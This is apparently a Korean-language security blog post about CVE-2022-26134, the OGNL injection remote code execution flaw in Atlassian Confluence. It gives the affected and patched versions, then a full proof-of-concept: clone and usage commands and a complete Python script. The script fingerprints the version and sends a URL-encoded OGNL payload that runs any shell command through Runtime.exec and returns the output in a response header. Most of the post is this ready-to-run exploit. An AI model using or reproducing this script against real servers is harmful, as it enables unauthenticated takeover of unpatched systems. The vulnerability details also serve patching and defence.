끝나지 않는 Log4Shell
CVE-2022-26134 OGNL injection vulnerability
CVSS : 10
Atlassian Confluence 7.18 이하 제품에 영향을 미치는 원격 코드 실행 취약점
인증되지 않은 사용자가 Confluence Server 또는 Data Center 인스턴스에서 임의의 코드를 실행시킬 수 있습니다.
Affected versions
지원되는 모든 Confluence Server 및 Data Center 버전이 영향을 받음
Confluence Server 및 Data Center 1.3.0 ~ 7.18.1 버전
Patched Versions
취약점 공개 후 패치가 포함된 버전 7.4.17, 7.13.7, 7.14.3, 7.15.2, 7.16.4, 7.17.4 and 7.18.1 출시
POC
git clone https://github.com/Nwqda/CVE-2022-26134
cd CVE-2022-26134
python3 cve-2022-26134.py https://target.com CMD
python3 cve-2022-26134.py https://target.com id
python3 cve-2022-26134.py https://target.com "ps aux"# -*- coding: utf-8 -*-
# Author: Naqwada (RuptureFarm 1029) <naqwada@pm.me>
# License: MIT License (http://www.opensource.org/licenses/mit-license.php)
# Docs: https://github.com/Naqwa/CVE-2022-26134
# Website: http://samy.link/
# Linkedin: https://www.linkedin.com/in/samy-younsi/
# Note: FOR EDUCATIONAL PURPOSE ONLY.
from bs4 import BeautifulSoup
import requests
import urllib3
import re
import sys
urllib3.disable_warnings()
def banner():
CVE_2022_26134Logo = """
_______ ________
/ ____/ | / / ____/
/ / | | / / __/
/ /___ | |/ / /___
\____/ |___/_____/___ ___ _____________ __ __
|__ \ / __ \__ \|__ \ |__ \ / ___< /__ // // /
__/ // / / /_/ /__/ /_______/ // __ \/ / /_ </ // /_
/ __// /_/ / __// __/_____/ __// /_/ / /___/ /__ __/
/____/\____/____/____/ /____/\____/_//____/ /_/
\033[1;91mCVE-2022-26134 - OGNL injection vulnerability\033[1;m
Author: \033[1;92mNaqwada\033[1;m
RuptureFarm 1029
FOR EDUCATIONAL PURPOSE ONLY.
"""
return print('\033[1;94m{}\033[1;m'.format(CVE_2022_26134Logo))
def check_target_version(host):
try:
response = requests.get("{}/login.action".format(host), verify=False, timeout=8)
if response.status_code == 200:
filter_version = re.findall("<span id='footer-build-information'>.*</span>", response.text)
if len(filter_version) >= 1:
version = filter_version[0].split("'>")[1].split('</')[0]
return version
else:
return False
else:
return host
except:
return False
def send_payload(host, command):
payload = "%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22{}%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D".format(command)
response = requests.get("{}/{}/".format(host, payload), verify=False, allow_redirects=False)
try:
if response.status_code == 302:
return response.headers["X-Cmd-Response"]
else:
return "This target does not seem to be vulnerable."
except:
return "This target does not seem to be vulnerable."
def main():
banner()
if len(sys.argv) < 3:
print("\033[1;94mHow to use:\033[1;m")
print("python3 {} https://target.com cmd".format(sys.argv[0]))
print("ex: python3 {} https://target.com id".format(sys.argv[0]))
print("ex: python3 {} https://target.com 'ps aux'".format(sys.argv[0]))
return
target = sys.argv[1]
cmd = sys.argv[2]
version = check_target_version(target)
if version:
print("Confluence target version: \033[1;94m{}\033[1;m".format(version))
else:
print("Can't find the used version for this target. Is the target offline?")
return
exec_payload = send_payload(target, cmd)
print(exec_payload)
if __name__ == "__main__":
main()
